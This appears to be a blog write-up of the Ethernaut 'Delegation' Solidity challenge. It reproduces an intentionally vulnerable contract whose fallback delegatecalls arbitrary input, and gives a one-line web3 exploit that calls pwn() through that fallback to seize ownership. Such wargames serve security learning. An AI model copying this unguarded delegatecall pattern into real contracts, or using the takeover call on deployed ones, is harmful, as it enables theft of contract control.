Wei's

Ethernaut - 6. Delegation

28 Aug 2022 ethernaut  solidity 

Difficulty: ๐ŸŒ•๐ŸŒ•๐ŸŒ‘๐ŸŒ‘๐ŸŒ‘

The goal of this level is for you to claim ownership of the instance you are given.

Things that might help

  • Look into Solidityโ€™s documentation on the delegatecall low level function, how it works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
  • Fallback methods
  • Method ids

Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Delegate {

  address public owner;

  constructor(address _owner) public {
    owner = _owner;
  }

  function pwn() public {
    owner = msg.sender;
  }
}

contract Delegation {

  address public owner;
  Delegate delegate;

  constructor(address _delegateAddress) public {
    delegate = Delegate(_delegateAddress);
    owner = msg.sender;
  }

  fallback() external {
    (bool result,) = address(delegate).delegatecall(msg.data);
    if (result) {
      this;
    }
  }
}

Writeup

  1. Get new Instance.
  2. Call the method 
    
await contract.sendTransaction({data: web3.eth.abi.encodeFunctionSignature("pwn()")})

    You can find the detail about encodeFunctionSignature() in there .

  3. Submit instance ฮพ( โœฟ๏ผžโ—กโ›)

Reference

Solidity by example - delegatecall

Related posts

Archive

solidity picoCTF Go ethernaut linux blockchain sql react smart-contract typescript solana javascript java ethereum css Linux zsh ubuntu next.js jekyll hardhat golang ethers Secureum Rust web wallet vscode truffle shell rpc notion notes nodejs nextjs mocha html github git geth express eslint docker cloudflare Vim DSA